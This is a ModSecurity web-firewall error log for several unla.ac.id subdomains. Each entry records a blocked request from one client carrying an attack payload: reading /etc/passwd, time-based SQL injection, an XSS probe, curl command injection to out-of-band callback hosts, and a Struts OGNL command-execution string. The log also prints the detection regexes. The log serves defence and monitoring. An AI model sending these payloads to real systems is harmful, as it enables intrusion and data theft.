[Tue Aug 29 11:33:45.502899 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/cgi-bin/stats"] [unique_id "ZO11KcCo-f0AAASEJPIAAAAE"]
[Tue Aug 29 11:33:45.506595 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ppp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ppp: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/jbossass/jbossass.jsp"] [unique_id "ZO11KcCo-f0AAANsAlMAAAAD"]
[Tue Aug 29 11:33:46.317685 2023] [:error] [pid 1138] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:calendarId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  (5440=5440 found within ARGS:calendarId: 1) AND (SELECT 2065 FROM (SELECT(SLEEP(6)))jtGw) AND (5440=5440"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11KsCo-f0AAARy-z0AAAAb"]
[Tue Aug 29 11:33:46.321507 2023] [:error] [pid 1152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:calendarId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  (5440=5440 found within ARGS:calendarId: 1) AND (SELECT 2065 FROM (SELECT(SLEEP(6)))jtGw) AND (5440=5440"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11KsCo-f0AAASAHc0AAAAH"]
[Tue Aug 29 11:33:46.323580 2023] [:error] [pid 1155] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:calendarId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  (5440=5440 found within ARGS:calendarId: 1) AND (SELECT 2065 FROM (SELECT(SLEEP(6)))jtGw) AND (5440=5440"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11KsCo-f0AAASDb58AAAAA"]
[Tue Aug 29 11:33:46.342651 2023] [:error] [pid 1152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:calendarId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  (5440=5440 found within ARGS:calendarId: 1) AND (SELECT 2065 FROM (SELECT(SLEEP(6)))jtGw) AND (5440=5440"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11KsCo-f0AAASAHc4AAAAH"]
[Tue Aug 29 11:33:46.361219 2023] [:error] [pid 1137] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/cgi-bin/test"] [unique_id "ZO11KsCo-f0AAARxOrMAAAAa"]
[Tue Aug 29 11:33:46.361599 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:topicId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:topicId: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/widgets/knowledgebase"] [unique_id "ZO11KsCo-f0AAASEJPYAAAAE"]
[Tue Aug 29 11:33:47.315074 2023] [:error] [pid 1157] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:calendarId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  (5440=5440 found within ARGS:calendarId: 1) AND (SELECT 2065 FROM (SELECT(SLEEP(6)))jtGw) AND (5440=5440"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11K8Co-f0AAASFedEAAAAG"]
[Tue Aug 29 11:33:47.319514 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:ssid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:ssid: \\x22'; curl http:/cjmn8l5jmimk2adbbnlgjkf9wgdo69h81.oast.site -H 'User-Agent: CRvF1U' #"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO11K8Co-f0AAANsAlUAAAAD"]
[Tue Aug 29 11:33:47.326785 2023] [:error] [pid 1155] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/cgi-bin/status/status.cgi"] [unique_id "ZO11K8Co-f0AAASDb6MAAAAA"]
[Tue Aug 29 11:33:47.360601 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:ssid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:ssid: \\x22'; curl http:/cjmn8l5jmimk2adbbnlgna1zbkzqywbmx.oast.site -H 'User-Agent: CRvF1U' #"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO11K8Co-f0AAANsAlcAAAAD"]
[Tue Aug 29 11:33:47.369372 2023] [:error] [pid 1128] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:calendarId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  (5440=5440 found within ARGS:calendarId: 1) AND (SELECT 2065 FROM (SELECT(SLEEP(6)))jtGw) AND (5440=5440"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11K8Co-f0AAARo83QAAAAT"]
[Tue Aug 29 11:33:47.393691 2023] [:error] [pid 1123] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:ssid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:ssid: \\x22'; curl http:/cjmn8l5jmimk2adbbnlgn7jazkt5w53pt.oast.site -H 'User-Agent: CRvF1U' #"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO11K8Co-f0AAARjjRoAAAAL"]
[Tue Aug 29 11:33:47.404512 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:ssid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:ssid: \\x22'; curl http:/cjmn8l5jmimk2adbbnlg5e7ft96nnheow.oast.site -H 'User-Agent: CRvF1U' #"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO11K8Co-f0AAANsAlkAAAAD"]
[Tue Aug 29 11:33:47.408152 2023] [:error] [pid 1128] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:ssid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:ssid: \\x22'; curl http:/cjmn8l5jmimk2adbbnlgfckxs13qysg8e.oast.site -H 'User-Agent: CRvF1U' #"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO11K8Co-f0AAARo83YAAAAT"]
[Tue Aug 29 11:33:48.311345 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:redirect:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#a=(new  found within ARGS_NAMES:redirect:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphon [hostname "unla.ac.id"] [uri "/index.action"] [unique_id "ZO11LMCo-f0AAASEJP0AAAAE"]
[Tue Aug 29 11:33:48.328801 2023] [:error] [pid 1128] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:ssid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:ssid: \\x22'; curl http:/cjmn8l5jmimk2adbbnlgymy7ttf5yb6zj.oast.site -H 'User-Agent: CRvF1U'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO11LMCo-f0AAARo83gAAAAT"]
[Tue Aug 29 11:33:48.335817 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:redirect:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#a=(new  found within ARGS_NAMES:redirect:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphon [hostname "journal.unla.ac.id"] [uri "/index.action"] [unique_id "ZO11LMCo-f0AAANsAlsAAAAD"]
[Tue Aug 29 11:33:48.346151 2023] [:error] [pid 1138] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:redirect:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#a=(new  found within ARGS_NAMES:redirect:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphon [hostname "pusatbahasa.unla.ac.id"] [uri "/index.action"] [unique_id "ZO11LMCo-f0AAARy-0MAAAAb"]
[Tue Aug 29 11:33:48.351581 2023] [:error] [pid 1128] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:redirect:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#a=(new  found within ARGS_NAMES:redirect:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphon [hostname "ft.unla.ac.id"] [uri "/index.action"] [unique_id "ZO11LMCo-f0AAARo83kAAAAT"]
[Tue Aug 29 11:33:48.377536 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:redirect:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#a=(new  found within ARGS_NAMES:redirect:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphon [hostname "informatika.unla.ac.id"] [uri "/index.action"] [unique_id "ZO11LMCo-f0AAASEJQAAAAAE"]
[Tue Aug 29 11:33:48.385160 2023] [:error] [pid 1152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:ssid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:ssid: \\x22'; curl http:/cjmn8l5jmimk2adbbnlgehk3tpa54qmur.oast.site -H 'User-Agent: CRvF1U'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO11LMCo-f0AAASAHdkAAAAH"]
